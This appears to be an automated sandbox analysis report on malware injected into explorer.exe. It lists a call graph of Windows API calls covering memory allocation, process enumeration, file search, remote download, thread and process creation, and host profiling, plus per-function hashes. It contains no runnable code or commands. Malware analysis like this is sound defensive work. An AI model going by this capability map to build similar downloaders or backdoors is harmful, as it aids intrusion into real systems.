4164->4165 4165->4162 4166->4118 4168 f2cf5a 4167->4168 4172 f2cf5c 4167->4172 4168->4132 4169 f2cfaa 4171 f282b4 NtFreeVirtualMemory 4169->4171 4170 f282b4 NtFreeVirtualMemory 4170->4172 4171->4168 4172->4169 4172->4170 4174 f2ce04 4173->4174 4175 f2b388 NtAllocateVirtualMemory 4174->4175 4176 f2ce3b 4174->4176 4177 f2ce6b 4175->4177 4176->4132 4177->4176 4178 f2bfc0 NtAllocateVirtualMemory 4177->4178 4179 f2ce9d 4178->4179 4180 f2b388 NtAllocateVirtualMemory 4179->4180 4181 f2cebc 4180->4181 4181->4176 4182 f282b4 NtFreeVirtualMemory 4181->4182 4182->4176 4219 f244ec 4183->4219 4184 f247e3 4188 f24900 4184->4188 4189 f247ee 4184->4189 4185 f24799 4186 f24852 4185->4186 4187 f247a4 4185->4187 4200 f2bfc0 NtAllocateVirtualMemory 4186->4200 4190 f247af 4187->4190 4191 f2494c 4187->4191 4246 f24334 4188->4246 4201 f2480f 4189->4201 4202 f249ec 4189->4202 4210 f247de 4189->4210 4193 f24931 4190->4193 4194 f247ba 4190->4194 4300 f22b28 4191->4300 4267 f22d50 CreateToolhelp32Snapshot 4193->4267 4197 f24942 4194->4197 4198 f247c5 4194->4198 4196 f24905 4196->4210 4251 f2c704 NtDelayExecution 4196->4251 4299 f2321c CreateThread 4197->4299 4203 f2483e 4198->4203 4204 f247cc 4198->4204 4218 f24870 4200->4218 4206 f2481a 4201->4206 4207 f249f8 4201->4207 4320 f27dfc 4202->4320 4234 f27940 4203->4234 4211 f247d7 4204->4211 4212 f2491d 4204->4212 4206->4210 4344 f24a20 4206->4344 4207->4210 4331 f27f54 4207->4331 4210->4132 4211->4210 4221 f27c98 4211->4221 4252 f27768 4212->4252 4218->4210 4220 f282b4 NtFreeVirtualMemory 4218->4220 4219->4184 4219->4185 4220->4210 4222 f27cb7 4221->4222 4223 f27cc4 MultiByteToWideChar 4222->4223 4352 f27a84 4223->4352 4226 f27ddf 4227 f282b4 NtFreeVirtualMemory 4226->4227 4233 f27dd8 4226->4233 4227->4233 4228 f27d4b VirtualAlloc 4229 f27d7e 4228->4229 4230 f2b388 NtAllocateVirtualMemory 4229->4230 4231 f27d88 CreateThread 4230->4231 4232 f282b4 NtFreeVirtualMemory 4231->4232 4232->4233 4233->4210 4441 f2830c 4234->4441 4236 f27970 4236->4210 4237 f27963 4237->4236 4238 f28bdc 3 API calls 4237->4238 4239 f279ba wsprintfW 4238->4239 4240 f282b4 NtFreeVirtualMemory 4239->4240 4241 f279df 4240->4241 4242 f27a07 MultiByteToWideChar 4241->4242 4243 f27a84 21 API calls 4242->4243 4244 f27a4f 4243->4244 4244->4236 4449 f2b8d4 4244->4449 4247 f24357 4246->4247 4248 f2434a SetEvent 4246->4248 4249 f24361 ReleaseMutex CloseHandle 4247->4249 4250 f2437b 4247->4250 4248->4247 4249->4250 4250->4196 4251->4196 4253 f277a7 4252->4253 4254 f2830c 4 API calls 4253->4254 4255 f277d3 4254->4255 4256 f28bdc 3 API calls 4255->4256 4264 f277e0 4255->4264 4257 f2782a wsprintfW 4256->4257 4258 f282b4 NtFreeVirtualMemory 4257->4258 4259 f2784f 4258->4259 4260 f27874 MultiByteToWideChar 4259->4260 4261 f27a84 21 API calls 4260->4261 4262 f278b9 4261->4262 4263 f278d9 MultiByteToWideChar 4262->4263 4263->4264 4265 f2790d 4263->4265 4264->4210 4265->4264 4454 f2b9a0 4265->4454 4268 f2b388 NtAllocateVirtualMemory 4267->4268 4269 f22d94 4268->4269 4270 f2be64 3 API calls 4269->4270 4271 f22ddd 4270->4271 4272 f231fb 4271->4272 4273 f22de9 Process32First 4271->4273 4274 f2be64 3 API calls 4272->4274 4275 f22e13 Process32Next 4273->4275 4276 f22e34 4273->4276 4277 f2320c 4274->4277 4275->4275 4275->4276 4278 f2b388 NtAllocateVirtualMemory 4276->4278 4277->4210 4279 f22e44 Process32First 4278->4279 4280 f22e60 4279->4280 4281 f22ead Process32First 4279->4281 4282 f22e68 Process32Next 4280->4282 4283 f231e6 4281->4283 4288 f22ec8 4281->4288 4282->4281 4282->4282 4284 f282b4 NtFreeVirtualMemory 4283->4284 4285 f231f0 CloseHandle 4284->4285 4285->4272 4286 f231cb Process32Next 4286->4283 4286->4288 4287 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4287->4288 4288->4286 4288->4287 4289 f22fe0 wsprintfA 4288->4289 4290 f2be64 3 API calls 4289->4290 4292 f2300d 4290->4292 4291 f2be64 3 API calls 4291->4292 4292->4291 4293 f23086 wsprintfA 4292->4293 4294 f2be64 3 API calls 4293->4294 4297 f230b3 4294->4297 4295 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4295->4297 4297->4295 4298 f2be64 3 API calls 4297->4298 4463 f2260c CreateToolhelp32Snapshot 4297->4463 4298->4286 4299->4210 4301 f2b388 NtAllocateVirtualMemory 4300->4301 4302 f22b3b 4301->4302 4303 f2be64 3 API calls 4302->4303 4304 f22b7b 4303->4304 4479 f28398 4304->4479 4306 f22cf3 4307 f282b4 NtFreeVirtualMemory 4306->4307 4309 f22d05 4306->4309 4307->4309 4308 f22b8e 4308->4306 4310 f2be64 3 API calls 4308->4310 4311 f2be64 3 API calls 4309->4311 4312 f22bda FindFirstFileA 4310->4312 4313 f22d40 4311->4313 4312->4306 4319 f22bfe 4312->4319 4313->4210 4314 f22ccd FindNextFileA 4315 f22ce8 FindClose 4314->4315 4314->4319 4315->4306 4316 f2be64 3 API calls 4316->4319 4317 f22c98 wsprintfA 4318 f2be64 3 API calls 4317->4318 4318->4319 4319->4314 4319->4316 4319->4317 4321 f27e17 4320->4321 4322 f27e24 MultiByteToWideChar 4321->4322 4323 f27a84 21 API calls 4322->4323 4324 f27e75 4323->4324 4325 f2b388 NtAllocateVirtualMemory 4324->4325 4330 f27f40 4324->4330 4326 f27eb6 4325->4326 4327 f2b388 NtAllocateVirtualMemory 4326->4327 4328 f27ed9 CreateThread 4327->4328 4329 f282b4 NtFreeVirtualMemory 4328->4329 4329->4330 4330->4210 4332 f27f6f 4331->4332 4333 f27f7c MultiByteToWideChar 4332->4333 4334 f27a84 21 API calls 4333->4334 4336 f27fcd 4334->4336 4335 f280a4 4335->4210 4336->4335 4337 f2b388 NtAllocateVirtualMemory 4336->4337 4338 f2800e 4337->4338 4487 f2c7dc 4338->4487 4341 f2b388 NtAllocateVirtualMemory 4342 f2803d CreateThread 4341->4342 4343 f282b4 NtFreeVirtualMemory 4342->4343 4343->4335 4345 f24a2c 4344->4345 4346 f24aec MultiByteToWideChar 4345->4346 4348 f24acc 4345->4348 4349 f24b7d MultiByteToWideChar 4345->4349 4350 f24bd6 wsprintfW 4345->4350 4347 f2830c 4 API calls 4346->4347 4347->4345 4348->4210 4349->4345 4351 f27a84 21 API calls 4350->4351 4351->4345 4353 f27ac4 4352->4353 4359 f27b28 4353->4359 4360 f2c00c NtAllocateVirtualMemory 4353->4360 4363 f2900c 4353->4363 4383 f276d8 4353->4383 4395 f28240 4353->4395 4355 f27c5d 4356 f27c68 4355->4356 4358 f282b4 NtFreeVirtualMemory 4355->4358 4356->4226 4356->4228 4357 f282b4 NtFreeVirtualMemory 4357->4355 4358->4356 4359->4355 4359->4357 4360->4353 4364 f2904b InternetOpenW 4363->4364 4365 f29086 4364->4365 4366 f2908b 4364->4366 4369 f29248 4365->4369 4370 f2923d InternetCloseHandle 4365->4370 4401 f255dc 4366->4401 4371 f29250 InternetCloseHandle 4369->4371 4372 f2925b 4369->4372 4370->4369 4371->4372 4372->4353 4373 f290f4 4375 f29106 4373->4375 4376 f282b4 NtFreeVirtualMemory 4373->4376 4377 f29118 InternetOpenUrlW 4375->4377 4378 f282b4 NtFreeVirtualMemory 4375->4378 4376->4375 4377->4365 4380 f29154 4377->4380 4378->4377 4379 f2915f InternetReadFile 4379->4380 4380->4365 4380->4379 4381 f2b648 3 API calls 4380->4381 4382 f2b388 NtAllocateVirtualMemory 4380->4382 4381->4380 4382->4380 4423 f292f8 4383->4423 4386 f276fb 4386->4353 4389 f2774e 4389->4386 4392 f282b4 NtFreeVirtualMemory 4389->4392 4390 f2bf78 3 API calls 4391 f27729 4390->4391 4391->4389 4393 f2772d 4391->4393 4392->4386 4394 f282b4 NtFreeVirtualMemory 4393->4394 4394->4386 4435 f280b8 4395->4435 4398 f2827f 4398->4353 4402 f25614 4401->4402 4403 f2b388 NtAllocateVirtualMemory 4402->4403 4404 f2563a 4403->4404 4405 f2b388 NtAllocateVirtualMemory 4404->4405 4406 f25650 InternetCrackUrlW 4405->4406 4407 f256ac 4406->4407 4408 f256c6 4406->4408 4409 f282b4 NtFreeVirtualMemory 4407->4409 4408->4365 4408->4373 4412 f2c860 4408->4412 4410 f256b9 4409->4410 4411 f282b4 NtFreeVirtualMemory 4410->4411 4411->4408 4413 f2c894 InternetConnectW 4412->4413 4414 f2c8df 4412->4414 4413->4414 4417 f2c8e4 HttpOpenRequestW 4413->4417 4415 f2c9e0 4414->4415 4416 f2c9d5 InternetCloseHandle 4414->4416 4418 f2c9f3 4415->4418 4419 f2c9e8 InternetCloseHandle 4415->4419 4416->4415 4417->4414 4420 f2c936 HttpSendRequestW 4417->4420 4418->4373 4419->4418 4421 f2c9a7 HttpSendRequestW 4420->4421 4422 f2c955 InternetQueryOptionW InternetSetOptionW 4420->4422 4421->4414 4422->4421 4424 f2c00c NtAllocateVirtualMemory 4423->4424 4426 f29318 4424->4426 4425 f276f7 4425->4386 4428 f2bf78 4425->4428 4426->4425 4427 f282b4 NtFreeVirtualMemory 4426->4427 4427->4425 4429 f2bf90 4428->4429 4432 f2bf0c 4429->4432 4431 f27713 4431->4389 4431->4390 4433 f2b704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4432->4433 4434 f2bf40 4433->4434 4434->4431 4436 f280f9 4435->4436 4437 f2810b RtlInitUnicodeString NtCreateFile 4436->4437 4438 f281b1 4437->4438 4438->4398 4439 f281c8 NtWriteFile 4438->4439 4440 f28230 NtClose 4439->4440 4440->4398 4442 f2b470 4441->4442 4443 f28326 SHGetFolderPathW 4442->4443 4444 f2834f 4443->4444 4445 f2c00c NtAllocateVirtualMemory 4444->4445 4447 f2835b 4445->4447 4446 f28368 4446->4237 4447->4446 4448 f2bf78 3 API calls 4447->4448 4448->4446 4450 f2b8ee 4449->4450 4451 f2b926 CreateProcessW 4450->4451 4452 f2b976 4451->4452 4453 f2b97a CloseHandle CloseHandle 4451->4453 4452->4236 4453->4452 4455 f2b9c0 4454->4455 4456 f2ba1e 4455->4456 4457 f2ba78 4455->4457 4458 f2ba53 wsprintfW 4456->4458 4459 f2baad wsprintfW 4457->4459 4460 f2bac8 CreateProcessW 4458->4460 4459->4460 4461 f2bb1b 4460->4461 4462 f2bb1f CloseHandle CloseHandle 4460->4462 4461->4264 4462->4461 4464 f22659 Process32First 4463->4464 4465 f2297e 4463->4465 4464->4465 4468 f2267f 4464->4468 4465->4297 4466 f22963 Process32Next 4466->4465 4466->4468 4467 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4467->4468 4468->4466 4468->4467 4469 f2279f wsprintfA 4468->4469 4470 f2be64 3 API calls 4469->4470 4472 f227cf 4470->4472 4471 f2be64 3 API calls 4471->4472 4472->4471 4473 f22839 wsprintfA 4472->4473 4474 f2be64 3 API calls 4473->4474 4477 f22869 4474->4477 4475 f2260c 3 API calls 4475->4477 4476 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4476->4477 4477->4475 4477->4476 4478 f2be64 3 API calls 4477->4478 4478->4466 4480 f2b470 4479->4480 4481 f283b2 SHGetFolderPathA 4480->4481 4482 f283db 4481->4482 4483 f2bfc0 NtAllocateVirtualMemory 4482->4483 4484 f283e7 4483->4484 4485 f283f4 4484->4485 4486 f2be64 3 API calls 4484->4486 4485->4308 4486->4485 4488 f2c7ef 4487->4488 4489 f28033 4487->4489 4490 f2b388 NtAllocateVirtualMemory 4488->4490 4489->4341 4490->4489 4492 f24411 4491->4492 4493 f2bfc0 NtAllocateVirtualMemory 4492->4493 4497 f24444 4493->4497 4494 f24451 4495 f244a4 4496 f282b4 NtFreeVirtualMemory 4495->4496 4496->4494 4497->4494 4497->4495 4498 f2448f MessageBoxA 4497->4498 4498->4495 4579 f2bb44 4580 f2bbc5 4579->4580 4581 f2bb62 4579->4581 4582 f2bb8e CreateFileMappingA 4581->4582 4582->4580 4583 f2bbcc MapViewOfFile 4582->4583 4583->4580 4585 f2bbff 4583->4585 4584 f2bcd5 VirtualFree 4586 f282b4 NtFreeVirtualMemory 4584->4586 4585->4584 4587 f2b388 NtAllocateVirtualMemory 4585->4587 4588 f2bd06 UnmapViewOfFile CloseHandle 4586->4588 4589 f2bc35 4587->4589 4588->4580 4590 f2be64 3 API calls 4589->4590 4591 f2bc87 4590->4591 4592 f2be64 3 API calls 4591->4592 4593 f2bc99 4592->4593 4594 f2bfc0 NtAllocateVirtualMemory 4593->4594 4595 f2bcaf 4594->4595 4596 f282b4 NtFreeVirtualMemory 4595->4596 4597 f2bccb 4596->4597 4598 f282b4 NtFreeVirtualMemory 4597->4598 4598->4584 4638 f24384 4639 f243a7 4638->4639 4640 f243a5 4638->4640 4641 f243c4 129 API calls 4639->4641 4641->4640 4642 f23304 4643 f23349 4642->4643 4701 f23322 4642->4701 4644 f2b388 NtAllocateVirtualMemory 4643->4644 4645 f23353 4644->4645 4645->4701 4760 f22164 4645->4760 4647 f23406 4648 f22164 21 API calls 4647->4648 4649 f2349e 4648->4649 4650 f22164 21 API calls 4649->4650 4651 f23537 4650->4651 4652 f22164 21 API calls 4651->4652 4653 f235d0 4652->4653 4654 f22164 21 API calls 4653->4654 4655 f23669 4654->4655 4656 f22164 21 API calls 4655->4656 4657 f23702 4656->4657 4658 f22164 21 API calls 4657->4658 4659 f2379b 4658->4659 4660 f22164 21 API calls 4659->4660 4661 f23834 4660->4661 4662 f22164 21 API calls 4661->4662 4663 f238cd 4662->4663 4664 f22164 21 API calls 4663->4664 4665 f23966 4664->4665 4666 f22164 21 API calls 4665->4666 4667 f239ff 4666->4667 4668 f2b388 NtAllocateVirtualMemory 4667->4668 4669 f23a12 4668->4669 4670 f23ad6 4669->4670 4671 f26fc0 NtAllocateVirtualMemory 4669->4671 4669->4701 4672 f26fc0 NtAllocateVirtualMemory 4670->4672 4673 f23b77 4670->4673 4680 f23a63 4671->4680 4682 f23b04 4672->4682 4674 f26fc0 NtAllocateVirtualMemory 4673->4674 4675 f23c18 4673->4675 4684 f23ba5 4674->4684 4676 f26fc0 NtAllocateVirtualMemory 4675->4676 4677 f23cb9 4675->4677 4690 f23c46 4676->4690 4678 f23d5a 4677->4678 4679 f26fc0 NtAllocateVirtualMemory 4677->4679 4681 f23dfb 4678->4681 4683 f26fc0 NtAllocateVirtualMemory 4678->4683 4693 f23ce7 4679->4693 4680->4670 4689 f2be64 3 API calls 4680->4689 4685 f26fc0 NtAllocateVirtualMemory 4681->4685 4686 f23e9c 4681->4686 4682->4673 4697 f2be64 3 API calls 4682->4697 4703 f23d88 4683->4703 4684->4675 4699 f2be64 3 API calls 4684->4699 4705 f23e29 4685->4705 4687 f23f3d 4686->4687 4691 f26fc0 NtAllocateVirtualMemory 4686->4691 4692 f26fc0 NtAllocateVirtualMemory 4687->4692 4696 f23fde 4687->4696 4688 f24138 4782 f22988 4688->4782 4694 f23abd 4689->4694 4690->4677 4709 f2be64 3 API calls 4690->4709 4716 f23eca 4691->4716 4720 f23f6b 4692->4720 4693->4678 4713 f2be64 3 API calls 4693->4713 4700 f2be64 3 API calls 4694->4700 4698 f2408b 4696->4698 4702 f26fc0 NtAllocateVirtualMemory 4696->4702 4704 f23b5e 4697->4704 4698->4688 4706 f26fc0 NtAllocateVirtualMemory 4698->4706 4707 f23bff 4699->4707 4708 f23acc 4700->4708 4723 f2400c 4702->4723 4703->4681 4717 f2be64 3 API calls 4703->4717 4710 f2be64 3 API calls 4704->4710 4705->4686 4726 f2be64 3 API calls 4705->4726 4732 f240b9 4706->4732 4714 f2be64 3 API calls 4707->4714 4715 f282b4 NtFreeVirtualMemory 4708->4715 4711 f23ca0 4709->4711 4712 f23b6d 4710->4712 4718 f2be64 3 API calls 4711->4718 4719 f282b4 NtFreeVirtualMemory 4712->4719 4721 f23d41 4713->4721 4722 f23c0e 4714->4722 4715->4670 4716->4687 4729 f2be64 3 API calls 4716->4729 4724 f23de2 4717->4724 4725 f23caf 4718->4725 4719->4673 4720->4696 4737 f2be64 3 API calls 4720->4737 4727 f2be64 3 API calls 4721->4727 4728 f282b4 NtFreeVirtualMemory 4722->4728 4723->4698 4740 f2be64 3 API calls 4723->4740 4730 f2be64 3 API calls 4724->4730 4731 f282b4 NtFreeVirtualMemory 4725->4731 4733 f23e83 4726->4733 4734 f23d50 4727->4734 4728->4675 4735 f23f24 4729->4735 4736 f23df1 4730->4736 4731->4677 4732->4688 4747 f2be64 3 API calls 4732->4747 4738 f2be64 3 API calls 4733->4738 4739 f282b4 NtFreeVirtualMemory 4734->4739 4741 f2be64 3 API calls 4735->4741 4742 f282b4 NtFreeVirtualMemory 4736->4742 4743 f23fc5 4737->4743 4744 f23e92 4738->4744 4739->4678 4745 f2406c 4740->4745 4746 f23f33 4741->4746 4742->4681 4748 f2be64 3 API calls 4743->4748 4749 f282b4 NtFreeVirtualMemory 4744->4749 4750 f2be64 3 API calls 4745->4750 4751 f282b4 NtFreeVirtualMemory 4746->4751 4752 f24119 4747->4752 4753 f23fd4 4748->4753 4749->4686 4754 f2407e 4750->4754 4751->4687 4755 f2be64 3 API calls 4752->4755 4756 f282b4 NtFreeVirtualMemory 4753->4756 4757 f282b4 NtFreeVirtualMemory 4754->4757 4758 f2412b 4755->4758 4756->4696 4757->4698 4759 f282b4 NtFreeVirtualMemory 4758->4759 4759->4688 4761 f221e4 4760->4761 4762 f221f6 6 API calls 4761->4762 4808 f22134 4762->4808 4764 f22333 CreateProcessW 4765 f2b388 NtAllocateVirtualMemory 4764->4765 4766 f22399 4765->4766 4767 f2b388 NtAllocateVirtualMemory 4766->4767 4775 f223d6 4767->4775 4768 f225e8 4771 f225fa 4768->4771 4772 f282b4 NtFreeVirtualMemory 4768->4772 4769 f225a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4769->4768 4770 f22401 PeekNamedPipe 4773 f224b9 PeekNamedPipe 4770->4773 4770->4775 4771->4647 4772->4771 4774 f22569 GetExitCodeProcess 4773->4774 4773->4775 4774->4775 4776 f2258f 4774->4776 4775->4768 4775->4769 4775->4770 4775->4773 4775->4774 4778 f22468 ReadFile 4775->4778 4780 f22518 ReadFile 4775->4780 4809 f2c704 NtDelayExecution 4775->4809 4776->4769 4779 f2be64 3 API calls 4778->4779 4779->4773 4781 f2be64 3 API calls 4780->4781 4781->4774 4783 f22b17 4782->4783 4784 f2299d 4782->4784 4783->4701 4784->4783 4785 f229ca 4784->4785 4786 f282b4 NtFreeVirtualMemory 4784->4786 4787 f229ea 4785->4787 4788 f282b4 NtFreeVirtualMemory 4785->4788 4786->4785 4789 f22a0a 4787->4789 4791 f282b4 NtFreeVirtualMemory 4787->4791 4788->4787 4790 f22a2a 4789->4790 4792 f282b4 NtFreeVirtualMemory 4789->4792 4793 f22a4a 4790->4793 4794 f282b4 NtFreeVirtualMemory 4790->4794 4791->4789 4792->4790 4795 f22a6a 4793->4795 4796 f282b4 NtFreeVirtualMemory 4793->4796 4794->4793 4797 f22a8a 4795->4797 4798 f282b4 NtFreeVirtualMemory 4795->4798 4796->4795 4799 f22aaa 4797->4799 4800 f282b4 NtFreeVirtualMemory 4797->4800 4798->4797 4801 f22aca 4799->4801 4802 f282b4 NtFreeVirtualMemory 4799->4802 4800->4799 4803 f22aea 4801->4803 4804 f282b4 NtFreeVirtualMemory 4801->4804 4802->4801 4805 f22b0a 4803->4805 4806 f282b4 NtFreeVirtualMemory 4803->4806 4804->4803 4807 f282b4 NtFreeVirtualMemory 4805->4807 4806->4805 4807->4783 4808->4764 4809->4775 4522 f2696b 4528 f25b7a new[] 4522->4528 4523 f269a2 GetExitCodeThread 4523->4528 4524 f269de GetExitCodeThread 4524->4528 4525 f25ba7 4526 f2c704 NtDelayExecution 4526->4528 4527 f25484 3 API calls 4527->4528 4528->4523 4528->4524 4528->4525 4528->4526 4528->4527 4529 f2bfc0 NtAllocateVirtualMemory 4528->4529 4530 f26404 wsprintfA 4528->4530 4531 f26025 wsprintfA 4528->4531 4532 f25f36 wsprintfA 4528->4532 4533 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4528->4533 4534 f28424 11 API calls 4528->4534 4535 f2b770 NtAllocateVirtualMemory 4528->4535 4536 f2b388 NtAllocateVirtualMemory 4528->4536 4537 f2b388 NtAllocateVirtualMemory 4528->4537 4541 f2b388 NtAllocateVirtualMemory 4528->4541 4544 f26fc0 NtAllocateVirtualMemory 4528->4544 4546 f282b4 NtFreeVirtualMemory 4528->4546 4547 f24e28 14 API calls 4528->4547 4548 f28bdc GetCursorPos GetTickCount RtlRandom 4528->4548 4549 f26cfc NtAllocateVirtualMemory 4528->4549 4550 f2b388 NtAllocateVirtualMemory 4528->4550 4551 f25734 73 API calls 4528->4551 4529->4528 4530->4528 4531->4528 4532->4528 4533->4528 4534->4528 4535->4528 4538 f26187 WideCharToMultiByte 4536->4538 4539 f26243 WideCharToMultiByte 4537->4539 4540 f2be64 3 API calls 4538->4540 4543 f2be64 3 API calls 4539->4543 4540->4528 4542 f262ff WideCharToMultiByte 4541->4542 4545 f2be64 3 API calls 4542->4545 4543->4528 4544->4528 4545->4528 4546->4528 4547->4528 4548->4528 4549->4528 4550->4528 4551->4528 4608 f2922b 4609 f29086 4608->4609 4610 f2904b InternetOpenW 4608->4610 4612 f29248 4609->4612 4613 f2923d InternetCloseHandle 4609->4613 4610->4609 4611 f2908b 4610->4611 4616 f255dc 3 API calls 4611->4616 4614 f29250 InternetCloseHandle 4612->4614 4615 f2925b 4612->4615 4613->4612 4614->4615 4617 f290ca 4616->4617 4617->4609 4618 f290f4 4617->4618 4619 f2c860 8 API calls 4617->4619 4620 f29106 4618->4620 4621 f282b4 NtFreeVirtualMemory 4618->4621 4619->4618 4622 f29118 InternetOpenUrlW 4620->4622 4623 f282b4 NtFreeVirtualMemory 4620->4623 4621->4620 4622->4609 4627 f29154 4622->4627 4623->4622 4624 f2915f InternetReadFile 4624->4627 4625 f2b648 3 API calls 4625->4627 4626 f2b388 NtAllocateVirtualMemory 4626->4627 4627->4609 4627->4624 4627->4625 4627->4626 4499 f28a58 4500 f28a79 4499->4500 4502 f28a72 4499->4502 4501 f28b63 GetProcAddress GetProcAddressForCaller 4500->4501 4500->4502 4501->4502 4599 f244b8 4602 f243c4 4599->4602 4603 f241b4 129 API calls 4602->4603 4604 f243cd 4603->4604 4605 f243eb 4604->4605 4607 f2c704 NtDelayExecution 4604->4607 4607->4604 4628 f27528 4629 f27548 4628->4629 4630 f2754f 4628->4630 4630->4629 4631 f26fc0 NtAllocateVirtualMemory 4630->4631 4632 f276a7 4631->4632 4634 f2c734 4632->4634 4635 f2c74f 4634->4635 4637 f2c74a 4634->4637 4636 f2b388 NtAllocateVirtualMemory 4635->4636 4636->4637 4637->4629 4552 f2b86c 4553 f2b880 4552->4553 4554 f2b8c6 4552->4554 4555 f2b89e VirtualFree 4553->4555 4556 f282b4 NtFreeVirtualMemory 4555->4556 4556->4554 4503 f2545d 4504 f25265 4503->4504 4514 f253a4 4503->4514 4507 f25315 4504->4507 4508 f25292 4504->4508 4505 f25479 4506 f282b4 NtFreeVirtualMemory 4506->4505 4509 f2532e HttpOpenRequestA 4507->4509 4510 f252ab HttpOpenRequestA 4508->4510 4513 f2539c 4509->4513 4510->4513 4513->4514 4515 f253b3 InternetSetOptionA 4513->4515 4516 f253d6 4513->4516 4514->4505 4514->4506 4515->4516 4517 f25424 HttpSendRequestA 4516->4517 4520 f253e0 4516->4520 4518 f25443 4517->4518 4518->4514 4519 f282b4 NtFreeVirtualMemory 4518->4519 4519->4514 4521 f253fb HttpSendRequestA 4520->4521 4521->4518

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00F28424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F28470
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F284A7
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00F284F0
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00F285DB
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00F2863F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID: o
                                                                                                                                                                                                                                                  • API String ID: 2074107575-252678980
                                                                                                                                                                                                                                                  • Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                                                  • Instruction ID: 26c7a4bb3474f26ae5366b550e63056d6add382a1a4a5f4152b24df15d517149
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07A11D3220AB9586DB70DB15F49036AB7A0F788794F540526EACE83B69DF3CC645DF40
                                                                                                                                                                                                                                                  Function 00F27274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 162 f27274-f272ab GetAdaptersInfo 163 f272f8-f272fe 162->163 164 f272ad-f272cd call f2b388 GetAdaptersInfo 162->164 166 f27300-f27305 call f282b4 163->166 167 f2730a 163->167 171 f272d1-f272dd 164->171 166->167 170 f2730f-f27313 167->170 172 f272e3-f272f6 171->172 173 f272df-f272e1 171->173 172->163 172->171 173->170
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F2729C
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI ref: 00F272C7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID: o
                                                                                                                                                                                                                                                  • API String ID: 2718687846-252678980
                                                                                                                                                                                                                                                  • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                  • Instruction ID: 65bf8e186ec1a43f102e60435e946bb5101a7d775e9fde7dd796e9472401ffa5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7001A272908B54C6DB30EB15F49531EB7A0F3C87A8F440225EA8D46B68DF7CCA859F04
                                                                                                                                                                                                                                                  Function 00F28D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 174 f28d3c-f28d6c call f2b470 GetUserNameA 177 f28d87-f28d95 174->177 178 f28d6e-f28d81 wsprintfA 174->178 178->177
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameUserwsprintf
                                                                                                                                                                                                                                                  • String ID: frontdesk
                                                                                                                                                                                                                                                  • API String ID: 54179028-1081972030
